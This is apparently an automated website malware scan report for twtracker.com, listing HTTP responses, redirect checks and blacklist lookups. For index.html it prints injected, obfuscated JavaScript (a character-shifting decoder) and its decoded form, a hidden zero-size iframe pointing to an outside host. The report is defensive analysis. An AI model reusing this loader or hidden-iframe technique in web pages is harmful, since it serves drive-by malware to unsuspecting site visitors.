Scanned pages/files
Request | Server response | Status |
http://twtracker.com/ | HTTP/1.1 200 OK Date: Sat, 04 Oct 2014 20:32:44 GMT Accept-Ranges: bytes ETag: "80ecb8a3abcbc71:eb4f" Server: Microsoft-IIS/6.0 Content-Length: 5398 Content-Location: http://twtracker.com/Index.html Content-Type: text/html Last-Modified: Sat, 21 Jul 2007 15:27:25 GMT X-Powered-By: ASP.NET | clean |
http://twtracker.com/index.html | 200 OK Content-Length: 5398 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function bless(s){
var s1=unescape(s.substr(0,s.length)); var t=''; for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)+7); document.write(unescape(t)); }; bless('%35%4C%5C%6B%62%69%6D%19%45%5A%67%60%6E%5A%60%5E%36%20%43%5A%6F%5A%6C%5C%6B%62%69%6D%20%37%5D%68%5C%6E%66%5E%67%6D%27%70%6B%62%6D%5E%21%6E%67%5E%6C%5C%5A%69%5E%21%20%1E%2C%3C%1E%2F%32%1E%2F%2F%1E%30%2B%1E%2F%2A%1E%2F%3D%1E%2F%2E%1E%2B%29%1E%30%2C%1E%30%2B%1E%2F%2C%1E%2C%3D%1E%2B%2B%1E%2F%31%1E%30 Decoded script: <Script Language='Javascript'>document.write(unescape('<iframe src="http://masonfl.com/qualitytest/" width=0 height=0></iframe>')); Antivirus reports:
| ||
http://twtracker.com/test404page.js | 404 Not Found Content-Length: 1850 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: twtracker.com
Result:
HTTP/1.1 200 OK
Date: Sat, 04 Oct 2014 20:32:44 GMT
Accept-Ranges: bytes
ETag: "80ecb8a3abcbc71:eb4f"
Server: Microsoft-IIS/6.0
Content-Length: 5398
Content-Location: http://twtracker.com/Index.html
Content-Type: text/html
Last-Modified: Sat, 21 Jul 2007 15:27:25 GMT
X-Powered-By: ASP.NET
...5398 bytes of data.
GET / HTTP/1.1
Host: twtracker.com
Result:
HTTP/1.1 200 OK
Date: Sat, 04 Oct 2014 20:32:44 GMT
Accept-Ranges: bytes
ETag: "80ecb8a3abcbc71:eb4f"
Server: Microsoft-IIS/6.0
Content-Length: 5398
Content-Location: http://twtracker.com/Index.html
Content-Type: text/html
Last-Modified: Sat, 21 Jul 2007 15:27:25 GMT
X-Powered-By: ASP.NET
...5398 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: twtracker.com
Referer: http://www.google.com/search?q=twtracker.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: twtracker.com
Referer: http://www.google.com/search?q=twtracker.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=twtracker.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://twtracker.com/
Result: twtracker.com is not infected or malware details are not published yet.
Result: twtracker.com is not infected or malware details are not published yet.